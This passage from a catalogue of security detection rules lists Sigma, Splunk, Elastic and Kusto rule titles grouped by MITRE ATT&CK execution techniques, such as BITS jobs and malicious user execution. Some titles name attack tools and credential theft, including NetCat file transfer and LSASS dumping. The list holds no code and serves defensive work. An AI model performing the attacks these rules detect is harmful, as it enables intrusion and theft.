- Splunk Windows Outlook Macro Created by Suspicious Process production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Execution from Archive production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Sigma WScript or CScript Dropper - File test
- Splunk Wscript_Cscript Execution (PowerShell)
- Splunk Wscript_Cscript Execution (Sysmon)
- Splunk Wscript_Cscript Execution (Windows Event Log)
- Sigma WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript test
- Sigma XSL Script Execution Via WMIC.EXE test
Command and Scripting Interpreter: Python T1059.006 11 rules
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Emotet Loader Execution Via .LNK File test
- Sigma Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution test
- Splunk Python Execution (Windows Event Log)
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Python Path Configuration File Creation - Linux test
- Sigma Python Path Configuration File Creation - MacOS test
- Sigma Python Path Configuration File Creation - Windows test
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Sigma Suspicious File Characteristics Due to Missing Fields test
Command and Scripting Interpreter: JavaScript T1059.007 45 rules
- Sigma Adwind RAT / JRAT test
- Sigma Adwind RAT / JRAT File Artifact test
- Sigma AppLocker Prevented Application or Script from Running test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Cscript/Wscript Uncommon Script Extension Execution test
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Elastic Execution of a Downloaded Windows Script production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - Koadic Execution test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Jscript Execution Using Cscript App production
- Elastic Microsoft Management Console File from Unusual Path production
- Splunk MS Scripting Process Loading Ldap Module production
- Splunk MS Scripting Process Loading WMI Module production
- Sigma MSHTA Execution with Suspicious File Extensions test
- Sigma Node Process Executions test
- Sigma NodeJS Execution of JavaScript File experimental
- Sigma Potential Dropper Script Execution Via WScript/CScript/MSHTA test
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Potentially Suspicious Inline JavaScript Execution via NodeJS Binary experimental
- Elastic Remote File Download via Script Interpreter production
- Elastic Remote XSL Script Execution via COM production
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Deno File Written from Remote Source experimental
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution with NodeJS production
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious JavaScript Execution via Deno production
- Splunk Windows Cmdline Tool Execution From Non-Shell Process production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Execution from Archive production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Sigma WScript or CScript Dropper - File test
- Splunk Wscript_Cscript Execution (PowerShell)
- Splunk Wscript_Cscript Execution (Sysmon)
- Splunk Wscript_Cscript Execution (Windows Event Log)
- Sigma WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript test
- Sigma XSL Script Execution Via WMIC.EXE test
Command and Scripting Interpreter: Cloud API T1059.009 1 rule
- Splunk Windows SQL Server Extended Procedure DLL Loading Hunt production
Command and Scripting Interpreter: AutoHotKey & AutoIT T1059.010 1 rule
- Elastic Renamed Automation Script Interpreter production
Software Deployment Tools T1072 11 rules
- Splunk Detection of tools built by NirSoft experimental
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies available
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies (ASIM Version)
- Sigma PDQ Deploy Remote Adminstartion Tool Execution test
- Elastic Potential WSUS Abuse for Lateral Movement production
- Sigma PUA - Radmin Viewer Utility Execution test
- Splunk Radmin execution (EDR)
- Splunk Radmin execution (Sysmon)
- Splunk Radmin execution (Windows Event Log)
- Sigma Restricted Software Access By SRP test
- Sigma Suspicious Csi.exe Usage test
Native API T1106 20 rules
- Sigma HackTool - CobaltStrike BOF Injection Pattern test
- Sigma HackTool - HandleKatz Duplicating LSASS Handle test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Kusto LSASS Dumping using Debug Privileges
- Elastic Persistence via Hidden Run Key Detected production
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Elastic Potential Credential Access via LSASS Memory Dump production
- Sigma Potential Direct Syscall of NtOpenProcess test
- Sigma Potential WinAPI Calls Via CommandLine test
- Sigma Potential WinAPI Calls Via PowerShell Scripts test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Process Injection From Untrusted Process
- Sigma Suspicious Mshta.EXE Execution Patterns test
- Elastic Suspicious Process Access via Direct System Call production
- Elastic Suspicious SolarWinds Child Process production
- Sigma Turla Group Named Pipes test
- Sigma WinAPI Function Calls Via PowerShell Scripts test
- Sigma WinAPI Library Calls Via PowerShell Scripts test
Trusted Developer Utilities Proxy Execution T1127 54 rules
- Sigma AspNetCompiler Execution test
- Sigma C# IL Code Compilation Via Ilasm.EXE test
- Splunk CDB Execution (Sysmon)
- Splunk CDB Execution (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Splunk ETW Registry Disabled production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Sigma JScript Compiler Execution test
- Sigma Kavremover Dropped Binary LOLBIN Usage test
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Sigma Microsoft Workflow Compiler Execution test
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Node Process Executions test
- Sigma Potential Arbitrary Code Execution Via Node.EXE test
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Sigma Potential Mftrace.EXE Abuse test
- Sigma Potentially Suspicious ASP.NET Compilation Via AspNetCompiler test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Splunk Proxy Execution via Appcert (PowerShell)
- Splunk Proxy Execution via Appcert (Sysmon)
- Splunk Proxy Execution via Appcert (Windows Event Log)
- Sigma Remote Thread Creation Ttdinject.exe Proxy test
- Sigma Silenttrinity Stager Msbuild Activity test
- Sigma SQL Client Tools PowerShell Session Detection test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Child Process of AspNetCompiler test
- Elastic Suspicious Execution from a Mounted Device production
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious microsoft workflow compiler usage production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Sigma Suspicious Use of CSharp Interactive Console test
- Kusto Trusted Developer Utilities Proxy Execution available
- Splunk Unusual AppCert Child Process (Sysmon)
- Splunk Unusual AppCert Child Process (Windows Event Log)
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Sigma Use of Remote.exe test
- Sigma Use of TTDInject.exe test
- Sigma Use of VSIISExeLauncher.exe test
- Sigma Use of Wfc.exe test
Trusted Developer Utilities Proxy Execution: MSBuild T1127.001 20 rules
- Elastic Delayed Execution via Ping production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Sigma Silenttrinity Stager Msbuild Activity test
- Elastic Suspicious Execution from a Mounted Device production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Elastic Unusual Network Activity from a Windows System Binary production
Trusted Developer Utilities Proxy Execution: ClickOnce T1127.002 1 rule
- Elastic Execution via Microsoft DotNet ClickOnce Host production
Shared Modules T1129 11 rules
- Elastic ImageLoad via Windows Update Auto Update Client production
- Sigma Katz Stealer DLL Loaded experimental
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Unsigned .node File Loaded experimental
- Splunk Windows Executable in Loaded Modules production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows PowerShell Script TabExpansion Direct Call production
- Splunk Windows Remote Image Load production
- Splunk Windows XLL File Creation Outside of Typical Location production
- Elastic WPS Office Exploitation via DLL Hijack production
BITS Jobs T1197 28 rules
- Sigma BITS Client BitsProxy DLL Loaded By Uncommon Process experimental
- Splunk BITS Job Persistence production
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Sigma BITS Transfer Job Download From Direct IP test
- Sigma BITS Transfer Job Download From File Sharing Domains test
- Sigma BITS Transfer Job Download To Potential Suspicious Folder test
- Sigma BITS Transfer Job Downloading File Potential Suspicious Extension test
- Sigma BITS Transfer Job With Uncommon Or Suspicious Remote TLD test
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Monitoring For Persistence Via BITS test
- Sigma New BITS Job Created Via Bitsadmin test
- Sigma New BITS Job Created Via PowerShell test
- Elastic Persistence via BITS Job Notify Cmdline production
- Splunk PowerShell Start-BitsTransfer production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
Exploitation for Client Execution T1203 44 rules
- Splunk Abuse EQNEDT32.EXE (EDR)
- Splunk Abuse EQNEDT32.EXE (Sysmon)
- Splunk Abuse EQNEDT32.EXE (Windows Event Log)
- Sigma Audit CVE Event test
- Elastic Creation of SettingContent-ms Files production
- Sigma CVE-2021-26858 Exchange Exploitation test
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits test
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum test
- Sigma CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process test
- Sigma Dfsvc.EXE Initiated Network Connection Over Uncommon Port test
- Sigma Dfsvc.EXE Network Connection To Non-Local IPs test
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Execution of File Written or Modified by Microsoft Office production
- Kusto Execution of software vulnerable to webp buffer overflow of CVE-2023-4863 available
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Sigma Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process experimental
- Sigma Java Running with Remote Debugging test
- Sigma Network Connection Initiated By Eqnedt32.EXE test
- Sigma Office Application Initiated Network Connection To Non-Local IP test
- Kusto Office Apps Launching Wscipt available
- Kusto PE file dropped in Color Profile Folder
- Sigma Potential CVE-2021-26857 Exploitation Attempt stable
- Elastic Potential CVE-2025-33053 Exploitation production
- Splunk Potential Follina_DogWalk Activity - mdst.exe (Sysmon)
- Elastic Potential Foxmail Exploitation production
- Elastic Potential Notepad Markdown RCE Exploitation production
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Sigma Potentially Suspicious Child Process Of WinRAR.EXE test
- Sigma Shai-Hulud Malicious Bun Execution experimental
- Sigma Shai-Hulud Malicious Bun Execution - Linux experimental
- Splunk Sunburst Correlation DLL and Network Event experimental
- Sigma Suspicious ArcSOC.exe Child Process experimental
- Elastic Suspicious Communication App Child Process production
- Sigma Suspicious HWP Sub Processes test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Splunk Suspicious process Spawned by Java (Windows Event Log)
- Sigma Suspicious Spool Service Child Process test
- Elastic Suspicious Zoom Child Process production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows Remote Image Load production
- Elastic WPS Office Exploitation via DLL Hijack production
User Execution T1204 143 rules
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma AppLocker Prevented Application or Script from Running test
- Sigma Arbitrary Shell Command Execution Via Settingcontent-Ms test
- Kusto Audit policy manipulation using auditpol utility
- Splunk Batch File Write to System32 production
- Splunk Clop Common Exec Parameter production
- Sigma CLR DLL Loaded Via Office Applications test
- Splunk Command Line Spawned by Archive Utility - Windows (Sysmon)
- Splunk Command Line Spawned by Archive Utility - Windows (Windows Event Log)
- Splunk Conti Common Exec parameter production
- Elastic Creation of SettingContent-ms Files production
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (EDR)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Sysmon)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Windows Event Log)
- Sigma DarkSide Ransomware Pattern test
- Kusto Detect .NET runtime being loaded in JScript for code execution available
- Splunk Detect Rare Executables production
- Sigma DotNET Assembly DLL Loaded Via Office Application test
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Splunk Drop IcedID License dat production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Sigma Edge abuse for payload download via console experimental
- Sigma Edge/Chrome headless feature abuse for payload download experimental
- Elastic Executable File Creation with Multiple Extensions production
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Splunk Explorer Child Process with Suspicious Command Line Padding (Sysmon)
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Elastic File with Suspicious Extension Downloaded production
- Sigma File With Uncommon Extension Created By An Office Application test
- Sigma FileFix - Command Evidence in TypedPaths experimental
- Sigma GAC DLL Loaded Via Office Applications test
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk ISO File in Temp Folder (Windows Event Log)
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Diagnostic Tool "DogWalk" Package Path Traversal (EDR)
- Splunk Microsoft Diagnostic Tool "DogWalk" Package Path Traversal (Sysmon)
- Splunk Microsoft Diagnostic Tool "DogWalk" Package Path Traversal (Windows Event Log)
- Sigma Microsoft Excel Add-In Loaded test
- Sigma Microsoft Excel Add-In Loaded From Uncommon Location test
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma Microsoft VBA For Outlook Addin Loaded Via Outlook test
- Sigma Microsoft Word Add-In Loaded test
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Elastic MS Office Macro Security Registry Modifications production
- Elastic Network Connection via Compiled HTML File production
- Sigma New Application in AppCompat test
- Splunk Office Spawns Suspicious Child Process (Sysmon)
- Splunk Office Spawns Suspicious Child Process (Windows Event Log)
- Sigma Potential ClickFix Execution Pattern - Registry experimental
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Sysmon)
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Windows Event Log)
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Masquerading as Business App Installer production
- Sigma Potential Maze Ransomware Activity test
- Elastic Potential Notepad Markdown RCE Exploitation production
- Sigma Potential Snatch Ransomware Activity stable
- Sigma Potential Suspicious Browser Launch From Document Reader Process test
- Sigma Potentially Suspicious WebDAV LNK Execution test
- Sigma PrinterNightmare Mimikatz Driver Name test
- Elastic Process Activity via Compiled HTML File production
- Splunk Process Executed from Downloads Folder - Windows (Sysmon)
- Splunk Process Executed from Downloads Folder - Windows (Windows Event Log)
- Splunk Rare executable from Microsoft Office (Sysmon)
- Splunk Rare executable from Microsoft Office (Windows Event Log)
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Elastic Remote Desktop File Opened from Suspicious Path production
- Sigma Remote DLL Load Via Rundll32.EXE test
- Splunk Revil Common Exec Parameter production
- Splunk Single Letter Process On Endpoint production
- Sigma Successful MSIX/AppX Package Installation experimental
- Sigma Suspicious Binaries and Scripts in Public Folder experimental
- Sigma Suspicious Binary In User Directory Spawned From Office Application test
- Sigma Suspicious ClickFix/FileFix Execution Pattern experimental
- Sigma Suspicious Deno File Written from Remote Source experimental
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious Execution from INET Cache production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious FileFix Execution Pattern experimental
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious LNK Command-Line Padding with Whitespace Characters experimental
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Outlook Child Process production
- Kusto Suspicious office child process created
- Sigma Suspicious Outlook Child Process test
- Elastic Suspicious PDF Reader Child Process production
- Splunk Suspicious Process Executed From Container File production
- Kusto Suspicious Process Injection from Office application available
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Troubleshooting Pack Cabinet Execution production
- Sigma Suspicious WMIC Execution Via Office Process test
- Sigma Suspicious WmiPrvSE Child Process test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Elastic Unusual Execution via Microsoft Common Console File production
- Sigma VBA DLL Loaded Via Office Application test
- Kusto VTI - High Severity SHA1 Collision Detection
- Splunk WebDAV LNK Execution (Sysmon)
- Splunk WebDAV LNK Execution (Windows Event Log)
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Splunk Windows AppX Deployment Package Installation Success production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Binary Execution from an Archive experimental
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows ISO LNK File Creation production
- Splunk Windows MSIX Package Interaction production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Elastic Windows Script Execution from Archive production
- Splunk Windows Suspect Process With Authentication Traffic production
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows Universal Data Link File Creation production
- Splunk Windows User Execution Malicious URL Shortcut File production
User Execution: Malicious Link T1204.001 8 rules
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Sigma Potential ClickFix Execution Pattern - Registry experimental
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Sysmon)
- Splunk Potential CVE-2024-21413: Outbound SMB from Outlook (Windows Event Log)
- Sigma Suspicious ClickFix/FileFix Execution Pattern experimental
- Splunk Windows ISO LNK File Creation production
- Splunk Windows PowerShell FakeCAPTCHA Clipboard Execution production
User Execution: Malicious File T1204.002 103 rules
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma AppLocker Prevented Application or Script from Running test
- Splunk Batch File Write to System32 production
- Sigma CLR DLL Loaded Via Office Applications test
- Splunk Command Line Spawned by Archive Utility - Windows (Sysmon)
- Splunk Command Line Spawned by Archive Utility - Windows (Windows Event Log)
- Elastic Creation of SettingContent-ms Files production
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (EDR)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Sysmon)
- Splunk CVE-2022-30190: Microsoft Office Code Execution Vulnerability (Windows Event Log)
- Sigma DotNET Assembly DLL Loaded Via Office Application test
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Splunk Drop IcedID License dat production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Executable File Creation with Multiple Extensions production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Splunk Explorer Child Process with Suspicious Command Line Padding (Sysmon)
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Elastic File with Suspicious Extension Downloaded production
- Sigma File With Uncommon Extension Created By An Office Application test
- Sigma GAC DLL Loaded Via Office Applications test
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk ISO File in Temp Folder (Windows Event Log)
- Splunk ISO Image Mounted - Windows (PowerShell)
- Splunk ISO Image Mounted - Windows (Windows Event Log)
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Elastic Microsoft Build Engine Started by an Office Application production
- Sigma Microsoft Excel Add-In Loaded test
- Sigma Microsoft Excel Add-In Loaded From Uncommon Location test
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma Microsoft VBA For Outlook Addin Loaded Via Outlook test
- Sigma Microsoft Word Add-In Loaded test
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Elastic MS Office Macro Security Registry Modifications production
- Elastic Network Connection via Compiled HTML File production
- Sigma New Application in AppCompat test
- Splunk Office Spawns Suspicious Child Process (Sysmon)
- Splunk Office Spawns Suspicious Child Process (Windows Event Log)
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Masquerading as Business App Installer production
- Sigma Potential Maze Ransomware Activity test
- Elastic Potential Notepad Markdown RCE Exploitation production
- Sigma Potential Suspicious Browser Launch From Document Reader Process test
- Elastic Process Activity via Compiled HTML File production
- Splunk Rare executable from Microsoft Office (Sysmon)
- Splunk Rare executable from Microsoft Office (Windows Event Log)
- Splunk Rare Process Execution (Sysmon)
- Splunk Rare Process Execution (Windows Event Log)
- Elastic Remote Desktop File Opened from Suspicious Path production
- Sigma Remote DLL Load Via Rundll32.EXE test
- Splunk Single Letter Process On Endpoint production
- Sigma Successful MSIX/AppX Package Installation experimental
- Sigma Suspicious Binary In User Directory Spawned From Office Application test
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious Execution from INET Cache production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious LNK Command-Line Padding with Whitespace Characters experimental
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious Outlook Child Process test
- Elastic Suspicious PDF Reader Child Process production
- Splunk Suspicious Process Executed From Container File production
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Troubleshooting Pack Cabinet Execution production
- Sigma Suspicious WMIC Execution Via Office Process test
- Sigma Suspicious WmiPrvSE Child Process test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Elastic Unusual Execution via Microsoft Common Console File production
- Sigma VBA DLL Loaded Via Office Application test
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Sigma Windows AppX Deployment Full Trust Package Installation experimental
- Splunk Windows AppX Deployment Full Trust Package Installation production
- Splunk Windows AppX Deployment Package Installation Success production
- Sigma Windows AppX Deployment Unsigned Package Installation experimental
- Splunk Windows AppX Deployment Unsigned Package Installation production
- Splunk Windows Binary Execution from an Archive experimental
- Splunk Windows Default Cobalt Strike PowerShell Beacon production
- Splunk Windows Developer-Signed MSIX Package Installation production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Explorer LNK Exploit Process Launch With Padding production
- Splunk Windows Explorer.exe Spawning PowerShell or Cmd production
- Splunk Windows MSIX Package Interaction production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell Script From WindowsApps Directory production
- Elastic Windows Script Execution from Archive production
- Splunk Windows Suspect Process With Authentication Traffic production
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows Universal Data Link File Creation production
- Splunk Windows User Execution Malicious URL Shortcut File production
User Execution: Malicious Copy and Paste T1204.004 8 rules
- Sigma FileFix - Command Evidence in TypedPaths experimental
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Suspicious ClickFix/FileFix Execution Pattern experimental
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious FileFix Execution Pattern experimental
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
Inter-Process Communication T1559 24 rules
- Sigma CMSTP Execution Process Access stable
- Sigma Dllhost.EXE Initiated Network Connection To Non-Local IP Address test
- Sigma DNS Query Request By Regsvr32.EXE test
- Sigma Enable Microsoft Dynamic Data Exchange test
- Elastic Execution of COM object via Xwizard production
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Potential Command and Control via Internet Explorer production
- Splunk Process Writing DynamicWrapperX production
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious Explorer Child Process production
- Elastic Suspicious Inter-Process Communication via Outlook production
- Kusto Suspicious named pipes available
- Sigma Trickbot Malware Activity stable
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
- Splunk Windows Anonymous Pipe Activity production
- Splunk Windows PUA Named Pipe production
- Splunk Windows RMM Named Pipe production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
Inter-Process Communication: Component Object Model T1559.001 16 rules
- Sigma CMSTP Execution Process Access stable
- Sigma Dllhost.EXE Initiated Network Connection To Non-Local IP Address test
- Sigma DNS Query Request By Regsvr32.EXE test
- Elastic Execution of COM object via Xwizard production
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Potential Command and Control via Internet Explorer production
- Splunk Process Writing DynamicWrapperX production
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious Explorer Child Process production
- Elastic Suspicious Inter-Process Communication via Outlook production
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
Inter-Process Communication: Dynamic Data Exchange T1559.002 1 rule
- Sigma Enable Microsoft Dynamic Data Exchange test
System Services T1569 88 rules
